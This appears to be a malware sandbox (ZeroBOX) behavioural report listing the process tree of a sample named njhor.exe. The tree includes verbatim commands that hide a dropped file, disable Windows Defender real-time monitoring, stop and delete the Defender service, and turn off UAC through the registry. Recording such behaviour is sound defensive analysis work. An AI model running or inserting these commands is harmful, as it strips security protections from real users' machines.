| ZeroBOX

njhor.exe "C:\Users\test22\AppData\Local\Temp\njhor.exe"
2552
attrib.exe attrib +h "C:\Users\test22\AppData\Local\Temp\dllhost.exe"
2816
cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2876
- powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2936
cmd.exe cmd /c sc query windefend
3040
- sc.exe sc query windefend
  1152
cmd.exe cmd /c sc stop windefend
1728
- sc.exe sc stop windefend
  152
cmd.exe cmd /c sc delete windefend
2228
- sc.exe sc delete windefend
  2316
cmd.exe cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2444
- reg.exe reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2568

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis